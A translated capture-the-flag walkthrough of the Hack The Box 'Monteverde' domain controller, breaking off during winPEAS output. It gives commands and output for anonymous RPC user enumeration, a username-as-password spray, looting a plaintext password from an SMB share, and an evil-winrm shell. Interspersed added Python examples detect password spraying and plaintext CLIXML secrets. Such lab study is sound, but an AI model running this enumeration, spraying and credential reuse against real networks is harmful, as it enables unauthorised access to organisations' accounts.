Monteverde-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: obtaining domain user IDs via the RPC service, weak passwords, SMB anonymous login, sensitive information disclosure, password/account enumeration, Azure Admins, Azure AD Connect

Reference: https://0xdf.gitlab.io/2020/06/13/htb-monteverde.html

0x01 Obtaining user access

1. Target machine IP address: 10.10.10.172

2. Open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-11 23:11 CST
Nmap scan report for 10.10.10.172
Host is up (0.14s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49736/tcp open unknown
55252/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.42 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49736,55252,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49736,55252 --min-rate=10000 -sC -sV 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-11 23:13 CST
Nmap scan report for 10.10.10.172
Host is up (0.11s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-11 07:10:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49736/tcp open msrpc Microsoft Windows RPC
55252/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-05-11T07:11:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -8h03m31s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.05 seconds

3. Enumeration shows that the RPC service allows anonymous retrieval of some user information

┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U "" -N 10.10.10.172
rpcclient $>
rpcclient $> getusername
Account Name: ANONYMOUS LOGON, Authority Name: NT AUTHORITY
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $> lookupnames Guest
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
rpcclient $> getdcname
Usage: getdcname domainname
rpcclient $> lsaquery
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomains
name:[MEGABANK] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $> querydominfo
Domain: MEGABANK
Server:
Comment:
Total Users: 51
Total Groups: 0
Total Aliases: 23
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
rpcclient $>

4. Next, enumerate the usernames directly and extract the user IDs with a regex

┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U "" -N 10.10.10.172 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v 0x | tr -d "[]" > users

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat users
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

5. Besides rpcclient, the rpcenum tool can also be used for this enumeration; here is an example

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ sudo ./rpcenum -i 10.10.10.172 -e All
[sudo] kali 的密码:

[*] Enumerating Domain Users...

+ +
| Users |
+ +
| Guest |
| AAD_987d7f2f57d2 |
| mhope |
| SABatchJobs |
| svc-ata |
| svc-bexec |
| svc-netapp |
| dgalanos |
| roleary |
| smorgan |
+ +

[*] Listing domain users with description...

+ + +
| User | Description |
+ + +
| Guest | Built-in account for guest access to the computer/domain |
| AAD_987d7f2f57d2 | Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE. |
+ + +

[*] Enumerating Domain Admin Users...

+ +
| DomainAdminUsers |
+ +

[*] Enumerating Domain Groups...

+ + +
| DomainGroup | Description |
+ + +
| Enterprise Read-only Domain Controllers | Members of this group are Read-Only Domain Controllers in the enterprise |
| Domain Users | All domain users |
| Domain Guests | All domain guests |
| Domain Computers | All workstations and servers joined to the domain |
| Group Policy Creator Owners | Members in this group can modify group policy for the domain |
| Cloneable Domain Controllers | Members of this group that are domain controllers may be cloned. |
| Protected Users | Members of this group are afforded additional protections against authentication security threats. See http |
| DnsUpdateProxy | DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers). |
| Azure Admins | |
| File Server Admins | |
| Call Recording Admins | |
| Reception | |
| Operations | |
| Trading | |
| HelpDesk | |
| Developers | |
+ + +

6. After adding the domain name to the local hosts file, use kerbrute to verify whether each of the domain users actually exists

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ntpdate 10.10.10.172
[sudo] kali 的密码:
2024-05-11 15:48:55.823244 (+0800) -28784.200210 +/- 0.064667 10.10.10.172 s1 no-leap
CLOCK: time stepped by -28784.200210

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.172 MEGABANK.LOCAL" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.172 MEGABANK.LOCAL

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d MEGABANK.LOCAL --dc 10.10.10.172 ../users

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 05/11/24 - Ronnie Flathers @ropnop

2024/05/11 16:04:04 > Using KDC(s):
2024/05/11 16:04:04 > 10.10.10.172:88

2024/05/11 16:04:04 > [+] VALID USERNAME: AAD_987d7f2f57d2@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: mhope@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: svc-bexec@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: svc-netapp@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: svc-ata@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: smorgan@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: SABatchJobs@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: roleary@MEGABANK.LOCAL
2024/05/11 16:04:04 > [+] VALID USERNAME: dgalanos@MEGABANK.LOCAL
2024/05/11 16:04:04 > Done! Tested 10 usernames (9 valid) in 0.138 seconds

7. Most of the user IDs exist; only one account does not.

8. Next, try password-reuse enumeration to see whether any of these accounts have a weak password

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.172 -u ./users -p users --continue-on-success
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
......
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:svc-ata STATUS_LOGON_FAILURE
......
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:smorgan STATUS_LOGON_FAILURE
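Seen from the domain controller, the spray above is one source address producing failed logons against many distinct accounts within a few seconds, which looks nothing like a single user mistyping their own password. Added example, not from the original writeup: a small detector over constructed Security-log lines (Event ID 4625 with status 0xC000006D, "bad user name or password", and 4624 for a success); the flattened `ts|event_id|account|source_ip|status` record format is an assumption made for the sample.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one logon event per line in an assumed flattened
# "timestamp|event_id|account|source_ip|status" form. The first block mimics
# the spray above (many accounts, one source, one hit); the second block is a
# single user failing repeatedly, which must NOT trip the detector.
SAMPLE_LOG = """\
2024-05-11T08:10:01|4625|Guest|10.10.14.16|0xC000006D
2024-05-11T08:10:01|4625|AAD_987d7f2f57d2|10.10.14.16|0xC000006D
2024-05-11T08:10:02|4625|mhope|10.10.14.16|0xC000006D
2024-05-11T08:10:02|4624|SABatchJobs|10.10.14.16|0x0
2024-05-11T08:10:02|4625|svc-ata|10.10.14.16|0xC000006D
2024-05-11T08:10:03|4625|svc-bexec|10.10.14.16|0xC000006D
2024-05-11T08:10:03|4625|svc-netapp|10.10.14.16|0xC000006D
2024-05-11T08:10:03|4625|dgalanos|10.10.14.16|0xC000006D
2024-05-11T08:10:04|4625|roleary|10.10.14.16|0xC000006D
2024-05-11T08:10:04|4625|smorgan|10.10.14.16|0xC000006D
2024-05-11T08:30:00|4625|mhope|10.10.10.50|0xC000006D
2024-05-11T08:30:20|4625|mhope|10.10.10.50|0xC000006D
2024-05-11T08:30:40|4625|mhope|10.10.10.50|0xC000006D
"""

BAD_PASSWORD = "0xC000006D"  # NTSTATUS: unknown user name or bad password


def parse_log(text):
    """Turn the flattened sample lines into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, src, status = line.split("|")
        events.append({
            "ts": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "account": account,
            "src": src,
            "status": status,
        })
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """One alert per source IP whose bad-password failures touch at least
    `min_accounts` distinct accounts inside `window`. Each alert also lists
    accounts that *succeeded* from that source during the window: those are
    the spray's hits (SABatchJobs in the writeup) and the first thing to reset."""
    failures = defaultdict(list)   # src -> [(ts, account)]
    successes = defaultdict(list)  # src -> [(ts, account)]
    for e in events:
        if e["event_id"] == 4625 and e["status"] == BAD_PASSWORD:
            failures[e["src"]].append((e["ts"], e["account"]))
        elif e["event_id"] == 4624:
            successes[e["src"]].append((e["ts"], e["account"]))

    alerts = []
    for src, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            end = start + window
            accounts = {acct for ts, acct in fails[i:] if ts <= end}
            if len(accounts) >= min_accounts:
                hits = sorted({a for ts, a in successes[src] if start <= ts <= end})
                alerts.append({
                    "src": src,
                    "window_start": start,
                    "distinct_accounts": len(accounts),
                    "hits": hits,
                })
                break  # first window that trips is enough for this source
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_log(SAMPLE_LOG)):
        print(alert)
```

Tune `min_accounts` to the size of the environment; the source on 10.10.10.50 fails three times against one account and correctly produces no alert.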

9. One hit. Next, try the WinRM and SMB protocols to see whether this account can log in.

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p 'SABatchJobs'
SMB 10.10.10.172 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.10.10.172 5985 MONTEVERDE [*] http://10.10.10.172:5985/wsman
WINRM 10.10.10.172 5985 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

10. Only SMB accepts the login, so let's see which SMB shares are accessible

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -u SABatchJobs -p SABatchJobs -H 10.10.10.172

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.10.172:445 Name: MEGABANK.LOCAL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY

11. Several shares are readable; next, enumerate them to see whether they hold any interesting files

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\azure_uploads
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 20:43:06 2020
.. D 0 Fri Jan 3 20:43:06 2020

31999 blocks of size 4096. 28979 blocks available
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\NETLOGON
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 06:05:14 2020
.. D 0 Fri Jan 3 06:05:14 2020

5024511 blocks of size 4096. 803691 blocks available
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\SYSVOl
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 06:05:14 2020
.. D 0 Fri Jan 3 06:05:14 2020
MEGABANK.LOCAL Dr 0 Fri Jan 3 06:05:14 2020

5024511 blocks of size 4096. 803691 blocks available
smb: \> cd MEGABANK.LOCAL
smb: \MEGABANK.LOCAL\> ls
. D 0 Fri Jan 3 06:11:34 2020
.. D 0 Fri Jan 3 06:11:34 2020
DfsrPrivate DHSr 0 Fri Jan 3 06:11:34 2020
Policies D 0 Fri Jan 3 06:05:22 2020
scripts D 0 Fri Jan 3 06:05:14 2020

5024511 blocks of size 4096. 803691 blocks available
smb: \MEGABANK.LOCAL\>exit


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\users$
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 21:12:48 2020
.. D 0 Fri Jan 3 21:12:48 2020
dgalanos D 0 Fri Jan 3 21:12:30 2020
mhope D 0 Fri Jan 3 21:41:18 2020
roleary D 0 Fri Jan 3 21:10:30 2020
smorgan D 0 Fri Jan 3 21:10:24 2020

31999 blocks of size 4096. 28979 blocks available
smb: \>


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U SABatchJobs%SABatchJobs \\\\10.10.10.172\\users$
Try "help" to get a list of possible commands.
smb: \> cd dgalanos
smb: \dgalanos\> ls
. D 0 Fri Jan 3 21:12:30 2020
.. D 0 Fri Jan 3 21:12:30 2020

31999 blocks of size 4096. 28979 blocks available
smb: \dgalanos\> cd ../mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 21:41:18 2020
.. D 0 Fri Jan 3 21:41:18 2020
azure.xml AR 1212 Fri Jan 3 21:40:23 2020

31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \mhope\> cd ../roleary
smb: \roleary\> ls
. D 0 Fri Jan 3 21:10:30 2020
.. D 0 Fri Jan 3 21:10:30 2020

31999 blocks of size 4096. 28979 blocks available
smb: \roleary\> cd ../smorgan
smb: \smorgan\> ls
. D 0 Fri Jan 3 21:10:24 2020
.. D 0 Fri Jan 3 21:10:24 2020

31999 blocks of size 4096. 28979 blocks available
smb: \smorgan\> exit

12. A file was found here; on inspection, it contains a default password

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
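The file above is PowerShell CLIXML (the format written by Export-Clixml): the password sits in a plain `<S N="Password">` string element, whereas a SecureString would have been serialised as a DPAPI-protected `<SS>` element. Added example, not from the original writeup: a parser for this format that walks every `<Obj>` and flags string properties whose name suggests a secret, the kind of check a share audit can run over `.xml` files; the sample document is constructed with the same structure as azure.xml and a placeholder value, and the secret-name list is an assumption.

```python
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"

# Constructed stand-in for azure.xml: same layout, placeholder secret, and a
# leading byte-order mark (the '��' that cat printed before <Objs> above).
SAMPLE_CLIXML = "\ufeff" + """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER-SECRET</S>
    </Props>
  </Obj>
</Objs>
"""

# Assumed list of property names worth flagging when they hold a plain string.
SECRET_PROPS = {"password", "secret", "clientsecret", "token", "accesstoken", "key"}


def parse_clixml(text):
    """Return one dict per top-level <Obj>: its first type name and a map of
    property name -> (clixml element tag, text). Tags tell you how the value
    was serialised: S = string, SS = SecureString, DT = datetime, G = guid."""
    text = text.lstrip("\ufeff")  # drop the BOM so the parser sees '<' first
    root = ET.fromstring(text)
    ns = {"ps": PS_NS}
    objs = []
    for obj in root.findall("ps:Obj", ns):
        type_names = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
        props = {}
        for prop in obj.findall("ps:Props/*", ns):
            tag = prop.tag.split("}", 1)[1]  # "{namespace}S" -> "S"
            props[prop.get("N")] = (tag, prop.text)
        objs.append({"type": type_names[0] if type_names else None, "props": props})
    return objs


def find_plaintext_secrets(text):
    """Flag <S> properties with a secret-looking name. An <SS> element would be
    DPAPI-protected and usable only by the exporting user on the exporting host,
    so it is not reported; a plain <S> is readable by anyone who can read the file."""
    findings = []
    for obj in parse_clixml(text):
        for name, (tag, value) in obj["props"].items():
            if name and name.lower() in SECRET_PROPS and tag == "S" and value:
                findings.append({
                    "type": obj["type"],
                    "property": name,
                    "masked": value[:2] + "*" * (len(value) - 2),
                })
    return findings


if __name__ == "__main__":
    for f in find_plaintext_secrets(SAMPLE_CLIXML):
        print(f"{f['type']}: {f['property']} = {f['masked']}")
```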

13. Use this password to enumerate which user(s) it belongs to

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.172 -u users -p '4n0therD4y@n0th3r$' --continue-on-success
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\dgalanos:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE

14. Check whether this user can log in over WinRM

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
SMB 10.10.10.172 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.10.10.172 5985 MONTEVERDE [*] http://10.10.10.172:5985/wsman
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)

15. It can, so grab the first flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls


Directory: C:\Users\mhope\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/10/2024 11:57 PM 34 user.txt


*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
07a4bb734a0ae8190569915469c443e0
*Evil-WinRM* PS C:\Users\mhope\Desktop>

0x02 Obtaining system access

16. Start with a quick enumeration of user privileges, group memberships and similar information

*Evil-WinRM* PS C:\Users\mhope\Desktop> net user

User accounts for \\

-------------------------------------------------------------------------------
AAD_987d7f2f57d2 Administrator dgalanos
Guest krbtgt mhope
roleary SABatchJobs smorgan
svc-ata svc-bexec svc-netapp
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\mhope\Desktop> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*Azure Admins
*Call Recording Admins
*Cloneable Domain Controllers
*Developers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*File Server Admins
*Group Policy Creator Owners
*HelpDesk
*Key Admins
*Operations
*Protected Users
*Read-only Domain Controllers
*Reception
*Schema Admins
*Trading
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\mhope\Desktop> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 5/11/2024 1:54:49 AM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop> net group "Azure Admins"
Group name Azure Admins
Comment

Members

-------------------------------------------------------------------------------
AAD_987d7f2f57d2 Administrator mhope
The command completed successfully.

*Evil-WinRM* PS C:\Users\mhope\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\mhope\Desktop>

17. A special cloud-related group was found, but I'll set it aside for now and keep enumerating with tools

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /home/kali/Desktop/tools/winPEASx64.exe ../Desktop

Info: Uploading /home/kali/Desktop/tools/winPEASx64.exe to C:\Users\mhope\Documents\..\Desktop

Data: 3183272 bytes of 3183272 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls


Directory: C:\Users\mhope\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/10/2024 11:57 PM 34 user.txt
-a---- 5/11/2024 2:04 AM 2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\mhope\Desktop> ./winPEASx64.exe


Computer Name : MONTEVERDE
User Name : AAD_987d7f2f57d2
User Id : 1104
Is Enabled : True
User Type : User
Comment : Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
Last Logon : 5/10/2024 11:59:00 PM
Logons Count : 11
Password Last Set : 1/2/2020 3:53:24 PM


Computer Name : MONTEVERDE
User Name : svc-ata
User Id : 2603
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/3/2020 5:58:31 AM


Computer Name : MONTEVERDE
User Name : svc-bexec
User Id : 2604
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/3/2020 5:59:55 AM


Computer Name : MONTEVERDE
User Name : svc-netapp
User Id : 2605
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/3/2020 6:01:42 AM


Computer Name : MONTEVERDE
User Name : dgalanos
User Id : 2613
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/3/2020 6:06:10 AM


Computer Name : MONTEVERDE
User Name : roleary
User Id : 2614
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/3/2020 6:08:05 AM


Computer Name : MONTEVERDE
User Name : smorgan
User Id : 2615
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
